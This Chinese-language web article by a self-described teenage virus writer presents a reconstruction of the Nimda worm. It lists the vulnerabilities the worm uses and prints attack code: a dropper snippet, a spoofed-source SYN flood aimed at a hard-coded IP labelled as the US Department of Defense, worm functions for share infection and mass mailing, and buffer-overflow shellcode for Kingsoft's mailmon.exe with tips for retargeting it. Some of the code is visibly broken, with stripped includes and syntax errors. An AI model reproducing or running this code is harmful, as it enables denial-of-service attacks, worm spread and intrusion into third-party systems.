网络安全 频道

Nimda源代码级揭秘

1.0.0一些声明
本文并不是使用nimda的源代码来讲座的,本文的作者是根据对nimda的行为分析加上作者本人的功底自悟写出来的
本文提供的程序代码均在VC5.0/6.0+win9x/me/2000+sp1/xp/nt4.0+sp4下测试通过
1.0.1作者介绍
真实姓名:郭宏硕
网上姓名:Squirrel
真实地址:大连市第二十四中学高一年级
真实年龄:17(吃惊吗!)
病毒作品:太多了。。。(把大家害苦了)
邮编:116001
e-mail:suruixuan1@sina.com(属于苏睿暄病毒研发小组)
QQ:28386834
1.1.1
Unicode漏洞
最近网上关于它的东西有不少,所以我就不费口舌了。
直接从网上便可得到许多的资料
1.1.2
WinME/XP UPNP 漏洞
很多
黑客网站上都有它的资料,我就不在这里说了。有漏洞机器大约有30000来台,本次新增
1.1.3
金山毒霸2001的邮件监控(mailmon.exe)存在缓冲溢出漏洞
tombkeeper说的非常清楚,我就不多说了。这样的机器就更多了。本次新增
1.1.4
IIS5.0 .idq 漏洞
前些日子的Redcode就用的这个。本次新增
1.1.5
IIS4.0的缓冲漏洞
古老的漏洞了,不过仍有有这个漏洞的机器。本次新增
1.2 TFTP
这个东西用TFTPd.exe就行了,不过我这里使用TFTP.DLL作服务器。原因是我不想让人发现它的进程。这一次还利用了FTP服务器
www.wormworld.com作中转。本次改进
1.4 Riched20.dll
其实就是把%system%//Riched20.dll的结构导出来,修改Dllmain的代码,把病毒体从它的体内分离出来。
这东西写起来即麻烦又废时间,索性使用另外的方法代替了
riched20()函数的内容
HANDLE hFile=CreateFile("riched20.DLL",GENERIC_ALL,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
if(hFile==INVALID_HANDLE_VALUE)
{
//printf("\nCreate file %s failed:%d",RemoteFilePath,GetLastError());
return -1
}
//写文件内容
DWORD i=0,dwIndex=0,dwWrite,dwSize=sizeof(tftpdllbuff)
while(dwSize>dwIndex)
{
if(!WriteFile(hFile,&richedpdllbuff[dwIndex],dwSize-dwIndex,&dwWrite,NULL))
{
//printf("\nWrite file %s failed:%d","riched20.DLL",GetLastError());
return -1
}
dwIndex+=dwWrite;
}

//关闭文件句柄
CloseHandle(hFile);
1.5 Base64
看到代码就懂了
1.6 pe病毒部分
这是新功能。本次新增
1.7 SYNflood
分布式洪水报文攻击。本次新增。
1.8 主程序代码
CODE:
file://Don''''t forget to link with wsock32.lib :-o
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include #include
#include
#include
#include
#include
#include
#include
#define SEQ 0x28376839
#define SYN_DEST_IP "134.60.98.7" //目的IP(美国国防部)
#define FAKE_IP "134.60.98.7" //伪装IP超始值,本程序的伪装IP覆盖一个B类网段(美国国防部攻击美国国防部??!!)
#define STATUS_FAILED 0xFFFF //错误返回值

typedef struct _iphdr{ //定义IP首部
unsigned char h_verlen; //4位首部长度,4位IP版本号
unsigned char tos; //
unsigned short total_len;
unsigned short ident;
unsigned short frag_and_flags;
unsigned short ttl;
unsigned char proto;
unsigned short checksum;
unsigned int sourceIP;
unsigned int destIP;
}IP_HEADER;

struct{ //定义TCP伪首部
unsigned long saddr;
unsigned long daddr;
char mbz;
char ptcl;
unsigned short tcpl;
}psd_header;

typedef struct _tcphdr{ //定义TCP首部
USHORT th_sport;
USHORT th_dpost;
unsigned int ht_seq;
unsigned int ht_ack;
unsigned char th_lenres;
unsigned char th_flag;
USHORT th_win;
USHORT th_sum;
USHORT th_urp;
}TCP_HEADER;

USHORT checksum(USHORT *buffer,int size){ //计算验和的子函数
unsigned long chsum=0;
while(size>1){
chsum+=*buffer++;
size-=sizeof(USHORT);
}
if(size){
chsum+=*(UCHAR*)buffer;
}
chsum=(chsum>>16)+(chsum & 0xffff);
chsum+=(chsum>>16);
return (USHORT)(~chsum);
}
int WINAPI flood()
{
int datasize,ErrorCode,counter,flag,FakeIpNet,FakeIpHost;
int TimeOut=2000,SendSEQ=0;
char SendBuf[128]={0};
char RecvBuf[65535]={0};
WSADATA wsaData;
SOCKET SockRaw=(SOCKET)NULL;
struct sockaddr_in DestAddr;
IP_HEADER ip_header;
TCP_HEADER tcp_header;
//初始化SOCK_RAW
if((ErrorCode=WSAStartup(MAKEWORD(2,1),&wsaData))!=0){
//fprintf(stderr,"WSAStartup failed:%d\n",ErrorCode);
return 0
}
//建立套接字
SockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED);
if(SockRaw==INVALID_SOCKET){
//fprintf(stderr,"WSASocket() failed:%d\n",WSAGetLastError());
return 0
}
flag=TRUE;
//设置IP_HDRINCL以自己填充IP首部
ErrorCode=setsockopt(SockRaw,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(int));
if(ErrorCode==SOCKET_ERROR)//printf("Set IP_HDRINCL Error!\n");
__try{
ErrorCode=setsockopt(SockRaw,SOL_SOCKET,SO_SNDTIMEO,(char *)&TimeOut,sizeof(TimeOut));
if(ErrorCode==SOCKET_ERROR){
//fprintf(stderr,"Failed to set send TimeOut:%d\n",WSAGetLastError());
return 0
}
memset(&DestAddr,0,sizeof(DestAddr));
DestAddr.sin_family=AF_INET;
DestAddr.sin_addr.s_addr=inet_addr(SYN_DEST_IP);
FakeIpNet=inet_addr(FAKE_IP);
FakeIpHost=ntohl(FakeIpNet);
//填充IP首部
ip_header.h_verlen =(4<<4 | sizeof(ip_header)/sizeof(unsigned long)); //高四位IP版本号
ip_header.total_len =htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER)); //16位总长度
ip_header.ident =1;
ip_header.frag_and_flags =0;
ip_header.ttl =128;
ip_header.proto =IPPROTO_TCP;
ip_header.checksum =0;
ip_header.sourceIP =htonl(FakeIpHost+SendSEQ);
ip_header.destIP =inet_addr(SYN_DEST_IP);
//填充TCP首部
tcp_header.th_sport =htons(7000);
tcp_header.th_dpost =htons(8080);
tcp_header.ht_seq=htonl(SEQ+SendSEQ);
tcp_header.ht_ack=0;
tcp_header.th_lenres =(sizeof(TCP_HEADER)/4<<4|0);
tcp_header.th_flag =2;
tcp_header.th_win =htons(16384);
tcp_header.th_urp =0;
tcp_header.th_sum =0;
//填充TCP伪首部
psd_header.saddr=ip_header.sourceIP ;
psd_header.daddr=ip_header.destIP ;
psd_header.mbz=0;
psd_header.ptcl=IPPROTO_TCP;
psd_header.tcpl=htons(sizeof(tcp_header));
while(1){
//每发送1024个报文输出一个标示符
//printf(".");
for(counter=0;counter<1024;counter++){
if(SendSEQ++==65536)SendSEQ=1; //序列循环
//改IP首部
ip_header.checksum =0;
ip_header.sourceIP =htonl(FakeIpHost+SendSEQ); //32位源IP
//改TCP首部
tcp_header.ht_seq =htonl(SEQ+SendSEQ); //SYN序列号
tcp_header.th_sum =0;
//改TCP Pseudo Header
psd_header.saddr=ip_header.sourceIP ;
//计算TCP校验和,计算校验和时需要包括TCP pssudo header
memcpy(SendBuf,&psd_header,sizeof(psd_header));
memcpy(SendBuf+sizeof(psd_header),&tcp_header,sizeof(tcp_header));
tcp_header.th_sum=checksum((USHORT*)SendBuf,sizeof(psd_header)+sizeof(tcp_header));
//计算IP校验和
memcpy(SendBuf,&ip_header,sizeof(ip_header));
memcpy(SendBuf+sizeof(ip_header),&tcp_header,sizeof(tcp_header));
memcpy(SendBuf+sizeof(ip_header),sizeof(tcp_header),0,4);
datasize=sizeof(ip_header)+sizeof(tcp_header);
//填充发送缓冲区
memcpy(SendBuf,&ip_header,sizeof(ip_header));
//发送
ErrorCode=sendto(SockRaw,SendBuf,datasize,0,(struct sockaddr*)&DestAddr,sizeof(DestAddr));
if(ErrorCode==SOCKET_ERROR)//printf("\Send Error:%d\n",GetLastError());
}//end for
}//end while
}//end try
__finally{
if(SockRaw!=INVALID_SOCKET)closesocket(SockRaw);
WSACleanup();
}
return 0;
}//end flood

HMODULE hKERNEL32 ;
FARPROC a_RegisterServiceProcess ;

HMODULE hMPR ;
FARPROC a_WNetOpenEnum ;
FARPROC a_WNetCloseEnum ;
FARPROC a_WNetEnumResource ;

HMODULE hADVAPI ;
FARPROC a_RegOpenKeyExA ;
FARPROC a_RegQueryValueExA ;
FARPROC a_RegCloseKey ;

HINSTANCE hWINSOCK ;
FARPROC a_WSAStartup ;
FARPROC a_inet_addr ;
FARPROC a_gethostbyaddr ;
FARPROC a_gethostbyname ;
FARPROC a_htons ;
FARPROC a_socket ;
FARPROC a_connect ;
FARPROC a_send ;
FARPROC a_recv ;
FARPROC a_closesocket ;
FARPROC a_WSACleanup ;

SOCKET conn_socket ;

char szSMTPname[ 256] ;
char szSMTPaddr[ 256] ;
char szMAIL_FROM[ 256] ;
char szRCPT_TO[ 256] ;
int Found ;
BOOL InetActivated ;
BOOL MailDone ;
long WINAPI L0calThread ( long) ;
long WINAPI Rem0teThread ( long) ;
long WINAPI MailThread ( long) ;
void NetW0rming ( LPNETRESOURCE) ;
void Rem0teInfecti0n ( char *) ;
BOOL str2socket ( char *, BOOL) ;
BOOL GetSMTP ( char *, char *) ;
void base64_encode ( const void *, int) ;
char *DecryptStr ( char *) ;
void FindPe0ple ( char *) ;
void WaitC0nnected ( void) ;
BOOL CALLBACK EnumWindowsProc ( HWND, LPARAM) ;
//金山毒霸漏洞代码
unsigned char eip[8] = JUMPESP;
unsigned char sploitx[] = {
0x90, 0x8b, 0xfc,
0x33, 0xc0, 0x50, 0xf7, 0xd0, 0x50, 0x59, 0xf2, 0xaf, 0x59, 0xb1, 0xc6,
0x8b, 0xc7, 0x48, 0x80, 0x30, 0x99, 0xe2, 0xfa, 0x33, 0xf6, 0x96, 0xbb,
0x99, 0xac, 0xb0, 0x42, 0xc1, 0xeb, 0x08, 0x56, 0xff, 0x13, 0x8b, 0xd0,
0xfc, 0x33, 0xc9, 0xb1, 0x0b, 0x49, 0x32, 0xc0, 0xac, 0x84, 0xc0, 0x75,
0xf9, 0x52, 0x51, 0x56, 0x52, 0xb3, 0xe0, 0xff, 0x13, 0xab, 0x59, 0x5a,
0xe2, 0xec, 0x32, 0xc0, 0xac, 0x84, 0xc0, 0x75, 0xf9, 0xb3, 0xac, 0x56,
0xff, 0x13, 0x8b, 0xd0, 0xfc, 0x33, 0xc9, 0xb1, 0x06, 0x32, 0xc0, 0xac,
0x84, 0xc0, 0x75, 0xf9, 0x52, 0x51, 0x56, 0x52, 0xb3, 0xe0, 0xff, 0x13,
0xab, 0x59, 0x5a, 0xe2, 0xec, 0x83, 0xc6, 0x05, 0x33, 0xc0, 0x50, 0x40,
0x50, 0x40, 0x50, 0xff, 0x57, 0xe8, 0x93, 0x6a, 0x10, 0x56, 0x53, 0xff,
0x57, 0xec, 0x6a, 0x02, 0x53, 0xff, 0x57, 0xf0, 0x33, 0xc0, 0x57, 0x50,
0xb0, 0x0c, 0xab, 0x58, 0xab, 0x40, 0xab, 0x5f, 0x48, 0x50, 0x57, 0x56,
0xad, 0x56, 0xff, 0x57, 0xc0, 0x48, 0x50, 0x57, 0xad, 0x56, 0xad, 0x56,
0xff, 0x57, 0xc0, 0x48, 0xb0, 0x44, 0x89, 0x07, 0x57, 0xff, 0x57, 0xc4,
0x33, 0xc0, 0x8b, 0x46, 0xf4, 0x89, 0x47, 0x3c, 0x89, 0x47, 0x40, 0x8b,
0x06, 0x89, 0x47, 0x38, 0x33, 0xc0, 0x66, 0xb8, 0x01, 0x01, 0x89, 0x47,
0x2c, 0x57, 0x57, 0x33, 0xc0, 0x50, 0x50, 0x50, 0x40, 0x50, 0x48, 0x50,
0x50, 0xad, 0x56, 0x33, 0xc0, 0x50, 0xff, 0x57, 0xc8, 0xff, 0x76, 0xf0,
0xff, 0x57, 0xcc, 0xff, 0x76, 0xfc, 0xff, 0x57, 0xcc, 0x48, 0x50, 0x50,
0x53, 0xff, 0x57, 0xf4, 0x8b, 0xd8, 0x33, 0xc0, 0xb4, 0x04, 0x50, 0xc1,
0xe8, 0x04, 0x50, 0xff, 0x57, 0xd4, 0x8b, 0xf0, 0x33, 0xc0, 0x8b, 0xc8,
0xb5, 0x04, 0x50, 0x50, 0x57, 0x51, 0x56, 0xff, 0x77, 0xa8, 0xff, 0x57,
0xd0, 0x83, 0x3f, 0x01, 0x7c, 0x22, 0x33, 0xc0, 0x50, 0x57, 0xff, 0x37,
0x56, 0xff, 0x77, 0xa8, 0xff, 0x57, 0xdc, 0x0b, 0xc0, 0x74, 0x2f, 0x33,
0xc0, 0x50, 0xff, 0x37, 0x56, 0x53, 0xff, 0x57, 0xf8, 0x6a, 0x50, 0xff,
0x57, 0xe0, 0xeb, 0xc8, 0x33, 0xc0, 0x50, 0xb4, 0x04, 0x50, 0x56, 0x53,
0xff, 0x57, 0xfc, 0x57, 0x33, 0xc9, 0x51, 0x50, 0x56, 0xff, 0x77, 0xac,
0xff, 0x57, 0xd8, 0x6a, 0x50, 0xff, 0x57, 0xe0, 0xeb, 0xaa, 0x50, 0xff,
0x57, 0xe4, 0x90, 0xd2, 0xdc, 0xcb, 0xd7, 0xdc, 0xd5, 0xaa, 0xab, 0x99,
0xda, 0xeb, 0xfc, 0xf8, 0xed, 0xfc, 0xc9, 0xf0, 0xe9, 0xfc, 0x99, 0xde,
0xfc, 0xed, 0xca, 0xed, 0xf8, 0xeb, 0xed, 0xec, 0xe9, 0xd0, 0xf7, 0xff,
0xf6, 0xd8, 0x99, 0xda, 0xeb, 0xfc, 0xf8, 0xed, 0xfc, 0xc9, 0xeb, 0xf6,
0xfa, 0xfc, 0xea, 0xea, 0xd8, 0x99, 0xda, 0xf5, 0xf6, 0xea, 0xfc, 0xd1,
0xf8, 0xf7, 0xfd, 0xf5, 0xfc, 0x99, 0xc9, 0xfc, 0xfc, 0xf2, 0xd7, 0xf8,
0xf4, 0xfc, 0xfd, 0xc9, 0xf0, 0xe9, 0xfc, 0x99, 0xde, 0xf5, 0xf6, 0xfb,
0xf8, 0xf5, 0xd8, 0xf5, 0xf5, 0xf6, 0xfa, 0x99, 0xce, 0xeb, 0xf0, 0xed,
0xfc, 0xdf, 0xf0, 0xf5, 0xfc, 0x99, 0xcb, 0xfc, 0xf8, 0xfd, 0xdf, 0xf0,
0xf5, 0xfc, 0x99, 0xca, 0xf5, 0xfc, 0xfc, 0xe9, 0x99, 0xdc, 0xe1, 0xf0,
0xed, 0xc9, 0xeb, 0xf6, 0xfa, 0xfc, 0xea, 0xea, 0x99, 0xce, 0xca, 0xd6,
0xda, 0xd2, 0xaa, 0xab, 0x99, 0xea, 0xf6, 0xfa, 0xf2, 0xfc, 0xed, 0x99,
0xfb, 0xf0, 0xf7, 0xfd, 0x99, 0xf5, 0xf0, 0xea, 0xed, 0xfc, 0xf7, 0x99,
0xf8, 0xfa, 0xfa, 0xfc, 0xe9, 0xed, 0x99, 0xea, 0xfc, 0xf7, 0xfd, 0x99,
0xeb, 0xfc, 0xfa, 0xef, 0x99, 0x9b, 0x99,
0x99, 0x0d, //port=148
0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99,
0xfa, 0xf4, 0xfd, 0xb7, 0xfc, 0xe1, 0xfc, 0x99, 0xff, 0xff, 0xff, 0xff,
0x0d, 0x0a};

//这段溢出代码是一段通用的溢出代码,只要改其中几个地方就可以用于任何一个程序的溢出,是ipxodi写的
//0xbb,0x99, 0xac, 0xb0, 0x42对应的汇编代码 mov ebx,42b0ach,是mailmon.exe中函数LoadLibraryA的入口地址
//可以用win32Dasm打开mailmon.exe查找LoadLibraryA,会看见:0040f7c2 ff15acb04200 Call dword ptr [0042b0ac]
//的字样,如果用于别的程序溢出,也可以这样查找并更改
//0xb3, 0xe0对应的汇编代码喂mov bl,e0h
//可以用win32Dasm打开mailmon.exe查找GetProcAddress,会看见:0041e2bf ff15acb04200 Call dword ptr [0042b0e0]
//的字样,它的地址和LoadLibraryA只最后一个字节不一样,所以mov bl,e0h
//0xb3, 0xac对应的汇编代码为mov bl,ac
//道理和上面一样

0
相关文章